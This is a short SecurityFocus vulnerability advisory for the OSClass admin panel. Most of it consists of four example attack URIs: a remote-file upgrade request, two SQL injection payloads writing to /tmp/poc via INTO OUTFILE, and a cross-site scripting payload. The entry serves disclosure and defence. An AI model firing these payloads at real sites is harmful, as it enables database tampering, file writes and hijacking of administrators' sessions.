OSClass Multiple Remote Vulnerabilities

An attacker can exploit these issues through a browser. To exploit cross-site scripting issue, an attacker must entice an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php

http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US%23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201

http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201

http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E


 

Privacy Statement
Copyright 2010, SecurityFocus